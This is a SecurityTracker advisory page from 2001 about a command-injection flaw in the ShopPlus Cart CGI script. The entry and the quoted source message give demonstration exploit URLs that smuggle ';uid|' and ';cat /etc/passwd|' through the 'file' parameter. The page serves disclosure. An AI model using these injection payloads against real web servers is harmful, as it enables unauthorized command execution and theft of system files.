SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   ShopPlus Cart Vendors:   Kabotie Software Technologies
ShopPlus Cart Commerce System Lets Remote Users Execute Arbitrary Shell Commands
SecurityTracker Alert ID:  1002332
SecurityTracker URL:  http://securitytracker.com/id/1002332
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 6 2001
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   A vulnerability has been reported in the ShopPlus Cart commerce system. An input validation flaw lets remote users execute arbitrary shell commands with the privileges of the web server.

It is reported that the ShopPlus Cart cgi code does not filter certain characters, allowing a remote user to specify shell commands in a URL request to cause shell commands to be executed by the web server with the privileges of the web server.

Some demonstration exploit URLs are provided:

host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|

Impact:   A remote user can execute arbitrary shell commands with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ksofttech.com/shopplus.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  ShopPlus Cart



                    ------------[ advisory ]------------
name: ShopPlus Cart

Bug Information:
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any product or services and
fully customize the shopping experience of your web site.
http://www.ksofttech.com/help/shopplus/

Problem:
Script doesnt check symbols. any user can execute commands on webserver.

Exploit:
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|


Bug found by Kernel|X| and aLph4Num3ric
E-Mail: 
secure@punkass.com               [kernel|x|]
alph4num3ric@crackdealer.com  [aLph4Num3ric]
WWW: www.russiahack.com / www.tmgroup.sh

------------
Thank you for using Anonymous mail system! message sent from www.tmgroup.sh

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC